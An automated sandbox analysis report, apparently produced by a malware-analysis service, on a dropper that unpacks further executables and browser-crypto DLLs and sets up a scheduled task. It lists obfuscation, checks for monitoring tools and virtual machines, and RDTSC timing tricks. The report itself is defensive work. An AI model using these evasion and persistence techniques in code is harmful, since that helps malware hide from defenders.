Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 10.2.explortu.exe.450000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kvnoqpwr:EW;skikhnnm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kvnoqpwr:EW;skikhnnm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Unpacked PE file: 14.2.cb41bc9329.exe.720000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8C3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C8C3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explortu.exe.8.dr Static PE information: real checksum: 0x1d5580 should be: 0x1d6fa2
Source: AFHDAKJKFC.exe.0.dr Static PE information: real checksum: 0x1d5580 should be: 0x1d6fa2
Source: random[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0x26de86
Source: wqmnYoVbHr.exe Static PE information: real checksum: 0x0 should be: 0x26de86
Source: cb41bc9329.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x26de86
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1d5580 should be: 0x1d6fa2
PE file contains sections with non-standard names
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: wqmnYoVbHr.exe Static PE information: section name:
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name:
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name: .idata
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name:
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name: kvnoqpwr
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name: skikhnnm
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: kvnoqpwr
Source: amadka[1].exe.0.dr Static PE information: section name: skikhnnm
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: .idata
Source: explortu.exe.8.dr Static PE information: section name:
Source: explortu.exe.8.dr Static PE information: section name: kvnoqpwr
Source: explortu.exe.8.dr Static PE information: section name: skikhnnm
Source: explortu.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Source: cb41bc9329.exe.13.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8FB536 push ecx; ret 0_2_6C8FB549
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA927A0 push 7EA90002h; ret 14_2_7EA927AF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA924A0 push 7EA90002h; ret 14_2_7EA924AF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA909A0 push 7EA90002h; ret 14_2_7EA909AF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA90CA0 push 7EA90002h; ret 14_2_7EA90CAF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA90FA0 push 7EA90002h; ret 14_2_7EA90FAF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA912A0 push 7EA90002h; ret 14_2_7EA912AF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA915A0 push 7EA90002h; ret 14_2_7EA915AF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA918A0 push 7EA90002h; ret 14_2_7EA918AF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91BA0 push 7EA90002h; ret 14_2_7EA91BAF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91EA0 push 7EA90002h; ret 14_2_7EA91EAF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA921A0 push 7EA90002h; ret 14_2_7EA921AF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA926B0 push 7EA90002h; ret 14_2_7EA926BF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA90BB0 push 7EA90002h; ret 14_2_7EA90BBF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA90EB0 push 7EA90002h; ret 14_2_7EA90EBF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA911B0 push 7EA90002h; ret 14_2_7EA911BF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA914B0 push 7EA90002h; ret 14_2_7EA914BF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA917B0 push 7EA90002h; ret 14_2_7EA917BF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91AB0 push 7EA90002h; ret 14_2_7EA91ABF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91DB0 push 7EA90002h; ret 14_2_7EA91DBF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA920B0 push 7EA90002h; ret 14_2_7EA920BF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA923B0 push 7EA90002h; ret 14_2_7EA923BF
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA92680 push 7EA90002h; ret 14_2_7EA9268F
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA90B80 push 7EA90002h; ret 14_2_7EA90B8F
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA90E80 push 7EA90002h; ret 14_2_7EA90E8F
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91180 push 7EA90002h; ret 14_2_7EA9118F
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91480 push 7EA90002h; ret 14_2_7EA9148F
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91780 push 7EA90002h; ret 14_2_7EA9178F
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91A80 push 7EA90002h; ret 14_2_7EA91A8F
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91D80 push 7EA90002h; ret 14_2_7EA91D8F
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA92080 push 7EA90002h; ret 14_2_7EA9208F
Source: wqmnYoVbHr.exe Static PE information: section name: entropy: 7.995047808192606
Source: wqmnYoVbHr.exe Static PE information: section name: entropy: 7.97800602768569
Source: wqmnYoVbHr.exe Static PE information: section name: entropy: 7.950066379373929
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name: entropy: 7.9863650425145885
Source: AFHDAKJKFC.exe.0.dr Static PE information: section name: kvnoqpwr entropy: 7.955195838755648
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.9863650425145885
Source: amadka[1].exe.0.dr Static PE information: section name: kvnoqpwr entropy: 7.955195838755648
Source: explortu.exe.8.dr Static PE information: section name: entropy: 7.9863650425145885
Source: explortu.exe.8.dr Static PE information: section name: kvnoqpwr entropy: 7.955195838755648
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.995047808192606
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.97800602768569
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.950066379373929
Source: cb41bc9329.exe.13.dr Static PE information: section name: entropy: 7.995047808192606
Source: cb41bc9329.exe.13.dr Static PE information: section name: entropy: 7.97800602768569
Source: cb41bc9329.exe.13.dr Static PE information: section name: entropy: 7.950066379373929
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe File created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C9255F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C9255F0
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 62D233 second address: 62D23D instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF7C6A41ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 62D23D second address: 62CA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 ja 00007FAF7CBD5D3Ch 0x0000000f sub dword ptr [ebp+122D18A2h], ebx 0x00000015 push dword ptr [ebp+122D0491h] 0x0000001b jmp 00007FAF7CBD5D46h 0x00000020 call dword ptr [ebp+122D2F7Ch] 0x00000026 pushad 0x00000027 sub dword ptr [ebp+122D2163h], ebx 0x0000002d xor eax, eax 0x0000002f jno 00007FAF7CBD5D42h 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 pushad 0x0000003a mov dword ptr [ebp+122D2163h], ebx 0x00000040 popad 0x00000041 mov dword ptr [ebp+122D38AAh], eax 0x00000047 stc 0x00000048 cmc 0x00000049 mov esi, 0000003Ch 0x0000004e jnp 00007FAF7CBD5D42h 0x00000054 jmp 00007FAF7CBD5D3Ch 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d jbe 00007FAF7CBD5D47h 0x00000063 jmp 00007FAF7CBD5D41h 0x00000068 lodsw 0x0000006a sub dword ptr [ebp+122D2163h], edx 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 mov dword ptr [ebp+122D2163h], edi 0x0000007a sub dword ptr [ebp+122D2C2Dh], esi 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007FAF7CBD5D45h 0x00000089 pushad 0x0000008a cmc 0x0000008b mov eax, dword ptr [ebp+122D364Eh] 0x00000091 popad 0x00000092 nop 0x00000093 pushad 0x00000094 jne 00007FAF7CBD5D38h 0x0000009a jmp 00007FAF7CBD5D3Bh 0x0000009f popad 0x000000a0 push eax 0x000000a1 je 00007FAF7CBD5D5Ah 0x000000a7 push eax 0x000000a8 push edx 0x000000a9 jmp 00007FAF7CBD5D42h 0x000000ae rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7B0D41 second address: 7B0D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7AFFA6 second address: 7AFFC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D45h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7B021E second address: 7B0234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAF7C6A41ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7B0234 second address: 7B0248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7B0399 second address: 7B039E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7B039E second address: 7B03A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7B03A4 second address: 7B03C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B1h 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d js 00007FAF7C6A41A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7B4452 second address: 7B449F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF7CBD5D3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FAF7CBD5D47h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edi 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FAF7CBD5D36h 0x0000001f popad 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FAF7CBD5D3Eh 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7A50CA second address: 7A50D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7A50D2 second address: 7A50D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D1B68 second address: 7D1B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D1B6C second address: 7D1B73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D2256 second address: 7D225A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D269D second address: 7D26A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D26A3 second address: 7D26A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D26A7 second address: 7D26B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAF7CBD5D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D2803 second address: 7D281F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAF7C6A41B4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7C931D second address: 7C9323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7C9323 second address: 7C9343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAF7C6A41B8h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D3407 second address: 7D3413 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D3413 second address: 7D342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D342E second address: 7D3434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7D35AC second address: 7D35B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
